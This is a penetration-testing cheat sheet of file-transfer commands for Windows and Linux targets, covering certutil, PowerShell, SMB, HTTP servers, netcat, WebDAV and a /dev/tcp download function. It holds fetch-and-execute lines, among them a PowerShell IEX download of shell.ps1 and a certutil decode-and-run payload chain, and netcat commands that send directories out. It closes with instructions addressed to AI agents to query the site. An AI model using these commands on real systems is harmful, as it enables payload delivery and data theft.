# share files

## Windows

```bash
certutil.exe -urlcache [-split] -f <source> <destn>
powershell wget <source> -OutFile <dest>
powershell Invoke-WebRequest -Uri <source> -Outfile <dest>
powershell -c (New-Object System.Net.WebClient).downloadFile('SOURCE', 'DESTN')
powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('/shell.ps1')
certutil.exe -urlcache -split -f <source> payload.b64 & certutil.exe -decode payload.b64 payload.exe & payload.exe
bitsadmin /transfer job <source> <dest>
wget.vbs https://gist.github.com/sckalath/ec7af6a1786e3de6c309

# SMB Server
impacket-smbserver [-smb2support] drive . [-user kashz -password kashz]

# on windows to copy (download)
copy \\IP\drive\FILE
# upload 
copy FILE \\IP\drive\

# mount smb-share-drive on windows using powershell
$pass = convertto-securestring 'kashz' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('kashz',$pass)
New-PSDrive -Name "kashz" -PSProvider "FileSystem" -Credential $cred -Root "\\IP\drive"
cd kashz:
# hosted files are here.

# upload dir (with all in it)
robocopy dir \\IP\drive\ /E
[OR]
net use Z: \\IP\drive /u:USER PASS
copy file Z:\
```

## HTTP Server

Alternative: [sc0tfree/updog](https://github.com/sc0tfree/updog)

```bash
python3 -m http.server 80
python2 -m SimpleHttpSever 80
php -S IP:PORT
wget <IP>:<PORT>/<file> -O <file>
curl <IP>:<PORT>/<file> -o <file>
scp file kashz@IP:/PATH/FILE

# download all files
wget -r <IP>:<PORT>/<DIR>/

# using base64
base64 <executable> > out
base64 -d out > <executable>
```

## NC

```bash
# receiver
nc -l -p <PORT> > out.file
# sender
nc -w 3 <IP> <PORT> < in.file

# receiver
nc -l -p 1234 | uncompress -c | tar xvfp -
# sender
tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234
```

## webdav

```bash
# pip install wsgidav cheroot
mkdir /tmp/kashz; wsgidav --host=IP --port=80 --root=/tmp/kashz

# windows
net use * http://IP/
```

## Curl function (linux only)

Use when system does not have `wget, curl.`NOTE: works for binary files too. Fails for `https://` with self signed certificates.

```bash
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}
# usage
__curl http://IP/FILE > out
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/kashz-jewels/tricks/share-files.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.